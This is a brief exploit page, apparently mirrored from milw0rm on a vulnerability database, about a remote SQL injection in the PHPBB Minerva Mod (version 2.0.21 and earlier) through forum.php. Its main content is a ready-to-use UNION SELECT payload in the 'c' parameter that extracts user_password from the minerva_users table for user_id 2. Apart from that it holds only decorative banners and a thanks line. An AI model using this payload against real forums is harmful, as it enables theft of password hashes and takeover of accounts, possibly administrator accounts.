Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:16459
HistoryMar 25, 2007 - 12:00 a.m.

PHPBB Minerva Mod <= 2.0.21 build 238a (forum.php) Remote SQL Injection Exploit

2007-03-2500:00:00
vulners.com
31

======================X=O=R=O=N=====================
+

  • PHPBB Minerva Mod <= 2.0.21 build 238a (forum.php) Remote SQL Injection Exploit

======================X=O=R=O=N=====================
+

======================X=O=R=O=N=====================
+

  • SQL INJ:
  • forum.php ?c=-1//UNION//SELECT//0,1,2,3,4,user_password,6//FROM/**/minerva_users%20where%20user_id=2/*

======================X=O=R=O=N=====================
+

======================X=O=R=O=N=====================
+

  • Special thanx: ajann

======================X=O=R=O=N=====================

milw0rm.com [2007-03-19]